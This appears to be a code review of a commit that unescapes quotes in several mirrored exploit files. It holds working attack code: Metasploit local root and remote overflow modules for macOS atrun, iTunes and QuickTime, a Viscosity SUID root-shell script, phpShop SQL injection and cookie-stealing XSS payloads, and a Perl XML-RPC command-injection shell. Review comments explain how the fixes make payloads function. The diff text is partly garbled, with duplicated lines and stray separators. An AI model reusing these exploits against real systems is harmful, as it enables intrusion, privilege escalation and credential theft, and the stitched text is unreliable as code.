fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");

execl(\"/tmp/ksh\", \"ksh\", NULL);
execl("/tmp/ksh", "ksh", NULL);

return 0;
}
}
# patch in our variable maildir and atrunpath
main.gsub!(/#define ATRUNPATH \"\\/usr\\/libexec\\/atrun\"/,
\"#define ATRUNPATH \\\"#{datastore[\"ATRUNPATH\"]}\\\"\")
main.gsub!(/#define MAILDIR \"\\/var\\/mail\"/,
\"#define MAILDIR \\\"#{datastore[\"MAILDIR\"]}\\\"\")
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
main.gsub!(/#define MAILDIR "\/var\/mail"/,
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")

executable_path = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(8)}\"
payload_file = \"#{rand_text_alpha(8)}\"
payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"
vprint_status(\"Writing Payload to #{payload_path}\")
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
payload_file = "#{rand_text_alpha(8)}"
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
vprint_status("Writing Payload to #{payload_path}")
# patch in to run our payload as part of ksh
main.gsub!(/execl\\(\"\\/tmp\\/ksh\", \"ksh\", NULL\\);/,
\"execl(\\\"/tmp/ksh\\\", \\\"ksh\\\", \\\"#{payload_path}\\\", NULL);\")
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")

write_file(payload_path, payload.encoded)
cmd_exec(\"chmod 555 #{payload_path}\")
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)

print_status \"Writing exploit to #{executable_path}.c\"
print_status "Writing exploit to #{executable_path}.c"

# clean previous bad attempts to prevent c code from exiting
rm_f executable_path
rm_f \'/tmp/atrun\'
whoami = cmd_exec(\'whoami\')
rm_f \"/tmp/#{whoami}\"
rm_f '/tmp/atrun'
whoami = cmd_exec('whoami')
rm_f "/tmp/#{whoami}"

write_file(\"#{executable_path}.c\", main)
print_status(\"Compiling #{executable_path}.c via gcc\")
output = cmd_exec(\"/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c\")
write_file("#{executable_path}.c", main)
print_status("Compiling #{executable_path}.c via gcc")
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
output.each_line { |line| vprint_status(line.chomp) }

print_status(\'Starting the payload handler...\')
print_status('Starting the payload handler...')
handler({})

print_status(\"Executing at #{Time.now}. May take up to 10min for callback\")
output = cmd_exec(\"chmod +x #{executable_path}.out; #{executable_path}.out\")
print_status("Executing at #{Time.now}. May take up to 10min for callback")
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
output.each_line { |line| vprint_status(line.chomp) }

# our sleep timer
stime = Time.now.to_f
until session_created? || stime + datastore[\'ListenerTimeout\'] < Time.now.to_f
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
print_status(\"#{Time.now}\")
print_status("#{Time.now}")
register_file_for_cleanup(executable_path)
register_file_for_cleanup(\"#{executable_path}.out\")
print_status(\"Remember to run: chown root:wheel #{datastore[\"ATRUNPATH\"]}\")
register_file_for_cleanup("#{executable_path}.out")
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
end
end

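Review bot: `"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\""` splices the datastore value into C source with no escaping, so a value containing `"` or `\` produces a file that gcc rejects; the same applies to the MAILDIR substitution and to `payload_path` in the `execl` rewrite, and the `rm_f '/tmp/atrun'` / `rm_f "/tmp/#{whoami}"` lines confirm that the backup paths are fixed rather than driven by WritableDir. The C code restores atrun's contents and mode (`chmod(ATRUNPATH, 0555)`) but not its ownership, which is why the module ends with `Remember to run: chown root:wheel`; that leftover state belongs in the Description, not only in a print_status the operator can miss.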
@ -19,18 +19,18 @@
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh

echo \"[+] Crafting payload.\"
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print \"[+] Cleaning up.\"
os.system(\"rm -rvf /tmp/pwn\")
print \"[+] Getting root.\"
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl(\"/bin/bash\", \"bash\")
os.execl("/bin/bash", "bash")
_EOF
echo \"[+] Making symlink.\"
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo \"[+] Running vulnerable SUID helper.\"
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/root

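Review bot: The heredoc delimiter in `cat > /tmp/pwn/site.py <<_EOF` is unquoted, so the shell applies `$` and backtick expansion to the Python body before writing it; nothing in the current body triggers that, but `<<'_EOF'` makes the file literal and removes the dependency. The embedded script uses Python 2 `print` statements, which is an unstated requirement on the target's interpreter.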
@ -9,7 +9,7 @@
# http://metasploit.com/framework/
##

require \'msf/core\'
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Apple OS X iTunes 8.1.1 ITMS Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
|
||||
'Description' => %q{
|
||||
This modules exploits a stack-based buffer overflow in iTunes
|
||||
itms:// URL parsing. It is accessible from the browser and
|
||||
in Safari, itms urls will be opened in iTunes automatically.
|
||||
Because iTunes is multithreaded, only vfork-based payloads should
|
||||
be used.
|
||||
},
|
||||
\'Author\' => [ \'Will Drewry <redpig [at] dataspill.org>\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 10998 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'Will Drewry <redpig [at] dataspill.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10998 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2009-0950\' ],
|
||||
[ \'OSVDB\', \'54833\' ],
|
||||
[ \'URL\', \'http://support.apple.com/kb/HT3592\' ],
|
||||
[ \'URL\', \'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html\' ]
|
||||
[ 'CVE', '2009-0950' ],
|
||||
[ 'OSVDB', '54833' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT3592' ],
|
||||
[ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]
|
||||
],
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024, # rough estimate of what browsers will pass.
|
||||
\'DisableNops\' => true, # don\'t pad out the space.
|
||||
\'BadChars\' => \'\',
|
||||
'Space' => 1024, # rough estimate of what browsers will pass.
|
||||
'DisableNops' => true, # don't pad out the space.
|
||||
'BadChars' => '',
|
||||
# The encoder must be URL-safe otherwise it will be automatically
|
||||
# URL encoded.
|
||||
\'EncoderType\' => Msf::Encoder::Type::AlphanumMixed,
|
||||
\'EncoderOptions\' =>
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
\'BufferRegister\' => \'ECX\', # See the comments below
|
||||
\'BufferOffset\' => 3, # See the comments below
|
||||
'BufferRegister' => 'ECX', # See the comments below
|
||||
'BufferOffset' => 3, # See the comments below
|
||||
},
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
\'OS X\',
|
||||
'OS X',
|
||||
{
|
||||
\'Platform\' => [ \'osx\' ],
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Addr\' => \'ATe\'
|
||||
'Platform' => [ 'osx' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Addr' => 'ATe'
|
||||
},
|
||||
]
|
||||
],
|
||||
\'DisclosureDate\' => \'Jun 01 2009\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'DisclosureDate' => 'Jun 01 2009',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
# Generate distribution script, which calls our payload using JavaScript.
|
||||
|
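Review bot: the `'DisableNops' => true, # don't pad out the space.` line shows the old escaping had been applied to comment text as well as to string literals, which confirms the stored copy was a serialized/quoted export rather than the module source; the unescape in this hunk is therefore needed everywhere, not only inside quotes. Two documentation nits survive the rewrite unchanged: the description still reads "This modules exploits" (should be "This module exploits"), and the `'Version' => '$Revision: 10998 $'` keyword is a leftover SVN expansion that carries no information in this mirror.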
@ -72,18 +72,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# itms:// or itmss:// can be used. The trailing colon is used
|
||||
# to start the attack. All data after the colon is copied to the
|
||||
# stack buffer.
|
||||
itms_base_url = \"itms://:\"
|
||||
itms_base_url = "itms://:"
|
||||
itms_base_url << rand_text_alpha(268) # Fill up the real buffer
|
||||
itms_base_url << rand_text_alpha(16) # $ebx, $esi, $edi, $ebp
|
||||
itms_base_url << target[\'Addr\'] # hullo there, jmp *%ecx!
|
||||
# The first \'/\' in the buffer will terminate the copy to the stack buffer.
|
||||
itms_base_url << target['Addr'] # hullo there, jmp *%ecx!
|
||||
# The first '/' in the buffer will terminate the copy to the stack buffer.
|
||||
# In addition, $ecx will be left pointing to the last 6 bytes of the heap
|
||||
# buffer containing the full URL. However, if a colon and a ? occur after
|
||||
# the value in ecx will point to that point in the heap buffer. In our
|
||||
# case, it will point to the beginning. The ! is there to make the
|
||||
# alphanumeric shellcode execute easily. (This is why we need an offset
|
||||
# of 3 in the payload).
|
||||
itms_base_url << \"/:!?\" # Truncate the stack buffer overflow and prep for payload
|
||||
itms_base_url << "/:!?" # Truncate the stack buffer overflow and prep for payload
|
||||
itms_base_url << p # Wooooooo! Payload time.
|
||||
# We drop on a few extra bytes as the last few bytes can sometimes be
|
||||
# corrupted.
|
||||
|
@ -93,31 +93,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# itms_base_url << Rex::Text.pattern_create(1024,
|
||||
# Rex::Text::DefaultPatternSets)
|
||||
|
||||
# Return back an example URL. Using an iframe doesn\'t work with all
|
||||
# browsers, but that\'s easy enough to fix if you need to.
|
||||
# Return back an example URL. Using an iframe doesn't work with all
|
||||
# browsers, but that's easy enough to fix if you need to.
|
||||
return String(<<-EOS)
|
||||
<html><head><title>iTunes loading . . .</title></head>
|
||||
<body>
|
||||
<script>document.location.assign(\"#{itms_base_url}\");</script>
|
||||
<p>iTunes should open automatically, but if it doesn\'t, click to
|
||||
<a href=\"#{itms_base_url}\">continue</a>.</p>a
|
||||
<script>document.location.assign("#{itms_base_url}");</script>
|
||||
<p>iTunes should open automatically, but if it doesn't, click to
|
||||
<a href="#{itms_base_url}">continue</a>.</p>a
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status(\"Generating payload...\")
|
||||
print_status("Generating payload...")
|
||||
return unless (p = regenerate_payload(cli))
|
||||
#print_status(\"=> #{payload.encoded}\")
|
||||
print_status(\"=> #{payload.encoded.length} bytes\")
|
||||
#print_status("=> #{payload.encoded}")
|
||||
print_status("=> #{payload.encoded.length} bytes")
|
||||
|
||||
print_status(\"Generating HTML container...\")
|
||||
print_status("Generating HTML container...")
|
||||
page = generate_itms_page(payload.encoded)
|
||||
#print_status(\"=> #{page}\")
|
||||
print_status(\"Sending itms page to #{cli.peerhost}:#{cli.peerport}\")
|
||||
#print_status("=> #{page}")
|
||||
print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
|
||||
|
||||
header = { \'Content-Type\' => \'text/html\' }
|
||||
header = { 'Content-Type' => 'text/html' }
|
||||
send_response_html(cli, page, header)
|
||||
handler(cli)
|
||||
end
|
||||
|
|
|
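Review bot: a typo is carried over in both the old and the new line of the heredoc: `<a href="#{itms_base_url}">continue</a>.</p>a` has a stray trailing `a` after `</p>`, which renders as literal text on the generated page. Since this commit is a mechanical unescape it is reasonable to leave it, but it should be recorded as a follow-up. The commented-out `#print_status("=> #{page}")` and `#print_status("=> #{payload.encoded}")` debug lines are unchanged and are the only other content here besides the quote fix.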
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
@ -18,131 +18,131 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'MacOS X QuickTime RTSP Content-Type Overflow\',
|
||||
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
|
||||
# Description?
|
||||
# Author?
|
||||
\'Version\' => \'$Revision: 10617 $\',
|
||||
\'Platform\' => \'osx\',
|
||||
\'References\' =>
|
||||
'Version' => '$Revision: 10617 $',
|
||||
'Platform' => 'osx',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2007-6166\' ],
|
||||
[ \'OSVDB\', \'40876\'],
|
||||
[ \'BID\', \'26549\' ],
|
||||
[ 'CVE', '2007-6166' ],
|
||||
[ 'OSVDB', '40876'],
|
||||
[ 'BID', '26549' ],
|
||||
],
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 3841,
|
||||
\'BadChars\' => \"\\x00\\x0a\\x0d\",
|
||||
\'MaxNops\' => 0,
|
||||
\'StackAdjustment\' => -3500,
|
||||
'Space' => 3841,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'MaxNops' => 0,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0\',
|
||||
[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
|
||||
{
|
||||
\'Arch\' => ARCH_PPC,
|
||||
\'Ret\' => 0x8fe3f88c,
|
||||
\'RetOffset\' => 551,
|
||||
\'PayloadOffset\' => 879
|
||||
'Arch' => ARCH_PPC,
|
||||
'Ret' => 0x8fe3f88c,
|
||||
'RetOffset' => 551,
|
||||
'PayloadOffset' => 879
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1\',
|
||||
[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
|
||||
{
|
||||
\'Arch\' => ARCH_PPC,
|
||||
\'Ret\' => 0x8fe042e0,
|
||||
\'RetOffset\' => 615,
|
||||
\'PayloadOffset\' => 3351
|
||||
'Arch' => ARCH_PPC,
|
||||
'Ret' => 0x8fe042e0,
|
||||
'RetOffset' => 615,
|
||||
'PayloadOffset' => 3351
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.4.8 x86, QuickTime 7.1.3\',
|
||||
[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
|
||||
{
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Offset\' => 307,
|
||||
\'Writable\' => 0xa0bd0f10, # libSystem __IMPORT
|
||||
'Arch' => ARCH_X86,
|
||||
'Offset' => 307,
|
||||
'Writable' => 0xa0bd0f10, # libSystem __IMPORT
|
||||
# The rest of these are all in libSystem __TEXT
|
||||
\'ret\' => 0x9015d336,
|
||||
\'poppopret\' => 0x9015d334,
|
||||
\'setjmp\' => 0x900bc438,
|
||||
\'strdup\' => 0x90012f40,
|
||||
\'jmp_eax\' => 0x9014a77f
|
||||
'ret' => 0x9015d336,
|
||||
'poppopret' => 0x9015d334,
|
||||
'setjmp' => 0x900bc438,
|
||||
'strdup' => 0x90012f40,
|
||||
'jmp_eax' => 0x9014a77f
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.5.0 x86, QuickTime 7.2.1\',
|
||||
[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
|
||||
{
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Offset\' => 307,
|
||||
\'Writable\' => 0x8fe66448, # dyld __IMPORT
|
||||
'Arch' => ARCH_X86,
|
||||
'Offset' => 307,
|
||||
'Writable' => 0x8fe66448, # dyld __IMPORT
|
||||
# The rest of these addresses are in dyld __TEXT
|
||||
\'ret\' => 0x8fe1ceee,
|
||||
\'poppopret\' => 0x8fe220d7,
|
||||
\'setjmp\' => 0x8fe1ceb0,
|
||||
\'strdup\' => 0x8fe1cd77,
|
||||
\'jmp_eax\' => 0x8fe01041
|
||||
'ret' => 0x8fe1ceee,
|
||||
'poppopret' => 0x8fe220d7,
|
||||
'setjmp' => 0x8fe1ceb0,
|
||||
'strdup' => 0x8fe1cd77,
|
||||
'jmp_eax' => 0x8fe01041
|
||||
}
|
||||
],
|
||||
|
||||
],
|
||||
\'DefaultTarget\' => 2,
|
||||
\'DisclosureDate\' => \'Nov 23 2007\'))
|
||||
'DefaultTarget' => 2,
|
||||
'DisclosureDate' => 'Nov 23 2007'))
|
||||
end
|
||||
|
||||
######
|
||||
# XXX: This does not work on Tiger apparently
|
||||
def make_exec_payload_from_heap_stub()
|
||||
frag0 =
|
||||
\"\\x90\" + # nop
|
||||
\"\\x58\" + # pop eax
|
||||
\"\\x61\" + # popa
|
||||
\"\\xc3\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x61" + # popa
|
||||
"\xc3" # ret
|
||||
|
||||
frag1 =
|
||||
\"\\x90\" + # nop
|
||||
\"\\x58\" + # pop eax
|
||||
\"\\x89\\xe0\" + # mov eax, esp
|
||||
\"\\x83\\xc0\\x0c\" + # add eax, byte +0xc
|
||||
\"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax
|
||||
\"\\xc3\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x89\xe0" + # mov eax, esp
|
||||
"\x83\xc0\x0c" + # add eax, byte +0xc
|
||||
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
|
||||
"\xc3" # ret
|
||||
|
||||
setjmp = target[\'setjmp\']
|
||||
writable = target[\'Writable\']
|
||||
strdup = target[\'strdup\']
|
||||
jmp_eax = target[\'jmp_eax\']
|
||||
setjmp = target['setjmp']
|
||||
writable = target['Writable']
|
||||
strdup = target['strdup']
|
||||
jmp_eax = target['jmp_eax']
|
||||
|
||||
exec_payload_from_heap_stub =
|
||||
frag0 +
|
||||
[setjmp].pack(\'V\') +
|
||||
[writable + 32, writable].pack(\"V2\") +
|
||||
[setjmp].pack('V') +
|
||||
[writable + 32, writable].pack("V2") +
|
||||
frag1 +
|
||||
\"X\" * 20 +
|
||||
[setjmp].pack(\'V\') +
|
||||
[writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +
|
||||
\"X\" * 4
|
||||
"X" * 20 +
|
||||
[setjmp].pack('V') +
|
||||
[writable + 24, writable, strdup, jmp_eax].pack("V4") +
|
||||
"X" * 4
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
print_status(\"Got client connection...\")
|
||||
print_status("Got client connection...")
|
||||
|
||||
if (target[\'Arch\'] == ARCH_PPC)
|
||||
ret_offset = target[\'RetOffset\']
|
||||
payload_offset = target[\'PayloadOffset\']
|
||||
if (target['Arch'] == ARCH_PPC)
|
||||
ret_offset = target['RetOffset']
|
||||
payload_offset = target['PayloadOffset']
|
||||
|
||||
# Create pattern sized up to payload, since it always follows
|
||||
# the return address.
|
||||
boom = Rex::Text.pattern_create(payload_offset)
|
||||
|
||||
boom[ret_offset, 4] = [target[\'Ret\']].pack(\'N\')
|
||||
boom[ret_offset, 4] = [target['Ret']].pack('N')
|
||||
boom[payload_offset, payload.encoded.length] = payload.encoded
|
||||
else
|
||||
boom = Rex::Text.pattern_create(327)
|
||||
|
||||
boom[307, 4] = [target[\'ret\']].pack(\'V\')
|
||||
boom[311, 4] = [target[\'ret\']].pack(\'V\')
|
||||
boom[315, 4] = [target[\'poppopret\']].pack(\'V\')
|
||||
boom[319, 4] = [target[\'Writable\']].pack(\'V\')
|
||||
boom[323, 4] = [target[\'Writable\']].pack(\'V\')
|
||||
boom[307, 4] = [target['ret']].pack('V')
|
||||
boom[311, 4] = [target['ret']].pack('V')
|
||||
boom[315, 4] = [target['poppopret']].pack('V')
|
||||
boom[319, 4] = [target['Writable']].pack('V')
|
||||
boom[323, 4] = [target['Writable']].pack('V')
|
||||
|
||||
#
|
||||
# Create exec-payload-from-heap-stub, but split it in two.
|
||||
|
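Review bot: in this hunk the change is semantic, not cosmetic. In Ruby a double-quoted `"\\x00\\x0a\\x0d"` is a twelve-character string of backslashes, letters and digits, whereas `"\x00\x0a\x0d"` is three bytes, so the stored `'BadChars'` value and every byte string in `frag0` and `frag1` (`"\x90"`, `"\x58"`, `"\x89\xe0"`, ...) had a different meaning in the old copy; the commit restores the values the module's comments (`# nop`, `# pop eax`, ...) describe. Separately, `# Description?` and `# Author?` remain placeholders in the `update_info` hash, so this module still ships without the metadata the framework expects.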
@ -160,23 +160,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
boom += payload.encoded
|
||||
end
|
||||
|
||||
body = \" \"
|
||||
body = " "
|
||||
header =
|
||||
\"RTSP/1.0 200 OK\\r\\n\"+
|
||||
\"CSeq: 1\\r\\n\"+
|
||||
\"Content-Type: #{boom}\\r\\n\"+
|
||||
\"Content-Length: #{body.length}\\r\\n\\r\\n\"
|
||||
"RTSP/1.0 200 OK\r\n"+
|
||||
"CSeq: 1\r\n"+
|
||||
"Content-Type: #{boom}\r\n"+
|
||||
"Content-Length: #{body.length}\r\n\r\n"
|
||||
|
||||
print_status(\"Sending RTSP response...\")
|
||||
print_status("Sending RTSP response...")
|
||||
client.put(header + body)
|
||||
|
||||
print_status(\"Sleeping...\")
|
||||
print_status("Sleeping...")
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
print_status(\"Starting handler...\")
|
||||
print_status("Starting handler...")
|
||||
handler(client)
|
||||
|
||||
print_status(\"Closing client...\")
|
||||
print_status("Closing client...")
|
||||
service.close_client(client)
|
||||
end
|
||||
end
|
||||
|
|
|
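Review bot: the `"RTSP/1.0 200 OK\r\n"`, `"CSeq: 1\r\n"` and `"Content-Length: #{body.length}\r\n\r\n"` lines are the same class of meaning fix as the previous hunk: with `\\r\\n` the stored copy would have emitted literal backslash characters instead of CRLF terminators, so the response header block in the old form did not parse as RTSP at all. The unchanged `select(nil,nil,nil,1)` sleep and `service.close_client(client)` are context only.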
@ -7,21 +7,21 @@ Web: http://www.andreafabrizi.it
|
|||
|
||||
|
||||
### SQL INJECTION
|
||||
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111\' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
|
||||
...and many others...
|
||||
|
||||
The SQL Injection security check can be bypassed replacing spaces with comments (/**/)
|
||||
|
||||
### BLIND SQL INJECTION
|
||||
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa\' and 1=1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa
|
||||
|
||||
|
||||
### CSRF
|
||||
|
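Review bot: apart from unescaping the quotes in the advisory's URLs, this hunk leaves the line "The SQL Injection security check can be bypassed replacing spaces with comments (/**/)" unchanged, and it is the substantive point of the advisory: a whitespace/keyword blacklist is not an injection defence, because comment tokens substitute for spaces in the SQL grammar. The remediation implied is parameterised queries for `module_id`, `product_id`, `vendor_id` and the other identifiers listed, not a stricter filter.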
@ -30,5 +30,5 @@ http://server/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
|
|||
|
||||
|
||||
### XSS
|
||||
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1\"><script>alert(document.cookie);</script>
|
||||
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
|
||||
...and many others...
|
|
@ -22,41 +22,41 @@ $| = 1; # fflush stdout after print
|
|||
|
||||
# Default options
|
||||
# connection
|
||||
my $basic_auth_user = \'\';
|
||||
my $basic_auth_pass = \'\';
|
||||
my $proxy = \'\';
|
||||
my $proxy_user = \'\';
|
||||
my $proxy_pass = \'\';
|
||||
my $basic_auth_user = '';
|
||||
my $basic_auth_pass = '';
|
||||
my $proxy = '';
|
||||
my $proxy_user = '';
|
||||
my $proxy_pass = '';
|
||||
my $conn_timeout = 15;
|
||||
|
||||
# general
|
||||
my $host;
|
||||
|
||||
#informational lines to feed my own ego.
|
||||
print \"xmlrpc exploit - http://www.reversing.org \\n\";
|
||||
print \"2005 ilo-- <ilo\".chr(64).\"reversing.org> \\n\";
|
||||
print \"special chars allowed are / and - \\n\\n\";
|
||||
print "xmlrpc exploit - http://www.reversing.org \n";
|
||||
print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
|
||||
print "special chars allowed are / and - \n\n";
|
||||
|
||||
# read command line options
|
||||
my $options = GetOptions (
|
||||
|
||||
#general options
|
||||
\'host=s\' => \\$host, # input host to test.
|
||||
'host=s' => \$host, # input host to test.
|
||||
|
||||
# connection options
|
||||
\'basic_auth_user=s\' => \\$basic_auth_user,
|
||||
\'basic_auth_pass=s\' => \\$basic_auth_pass,
|
||||
\'proxy=s\' => \\$proxy,
|
||||
\'proxy_user=s\' => \\$proxy_user,
|
||||
\'proxy_pass=s\' => \\$proxy_pass,
|
||||
\'timeout=i\' => \\$conn_timeout);
|
||||
'basic_auth_user=s' => \$basic_auth_user,
|
||||
'basic_auth_pass=s' => \$basic_auth_pass,
|
||||
'proxy=s' => \$proxy,
|
||||
'proxy_user=s' => \$proxy_user,
|
||||
'proxy_pass=s' => \$proxy_pass,
|
||||
'timeout=i' => \$conn_timeout);
|
||||
|
||||
# command line sanity check
|
||||
&show_usage unless ($host);
|
||||
|
||||
# main loop
|
||||
while (1){
|
||||
print \"\\nxmlrpc@# \";
|
||||
print "\nxmlrpc@# ";
|
||||
my $cmd = <STDIN>;
|
||||
xmlrpc_xploit ($cmd);
|
||||
}
|
||||
|
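Review bot: the `'host=s' => \$host` and `'basic_auth_user=s' => \$basic_auth_user` lines are more than a cosmetic change. In Perl `\$host` is a scalar reference, which is what `GetOptions` expects, whereas the stored `\\$host` is a reference to a reference, so the old copy would not have bound any of its command-line options; the commit restores a working option table. The `print "...\n"` changes in the same hunk are the usual backslash-to-newline fix.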
@ -68,25 +68,25 @@ sub xmlrpc_xploit {
|
|||
chomp (my $data = shift);
|
||||
my $reply;
|
||||
|
||||
my $d1 = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a\');\";
|
||||
my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCall>\";
|
||||
my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";
|
||||
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";
|
||||
|
||||
$data =~ s/-/\'.chr(45).\'/mg;
|
||||
$data =~ s/\\//\'.char(47).\'/mg;
|
||||
$data =~ s/-/'.chr(45).'/mg;
|
||||
$data =~ s/\//'.char(47).'/mg;
|
||||
|
||||
